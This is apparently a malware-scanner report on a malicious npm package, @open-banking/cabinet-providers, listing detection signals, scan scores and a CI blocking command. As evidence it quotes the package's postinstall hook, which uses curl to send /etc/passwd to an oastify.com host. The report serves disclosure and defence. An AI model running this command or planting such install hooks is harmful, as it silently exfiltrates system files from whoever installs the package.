npm · registry.npmjs.org
@open-banking/cabinet-providers
DNS / OAST exfiltration: matched "oastify.com"
Early detection
PkgRadar flagged this 10.0 days before public disclosure
Detected 2026-05-30 · disclosed as MAL-2026-5392 on 2026-06-09
Why PkgRadar flagged 999.9.5
| Severity | Signal | Evidence |
|---|---|---|
| high | DNS / OAST exfiltration | matched "oastify.com" · package/package.json |
| high | Install Lifecycle Dns Or Oast | postinstall="node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com" · package.json |
| high | New Account With Lifecycle Hook | package first published 16 day(s) ago, 2 total version(s), has lifecycle hook · package.json |
Scanned versions
| Version | Verdict | Score | Scanned (UTC) |
|---|---|---|---|
999.9.5 | High risk | 65 | 2026-06-13 |
999.9.2 | Review | 5 | 2026-05-30 |
Related campaigns
- scream3gg_bughunter — 8 releases, max score 65
Block this in CI
pkgradar gate --ecosystem npm @open-banking/[email protected]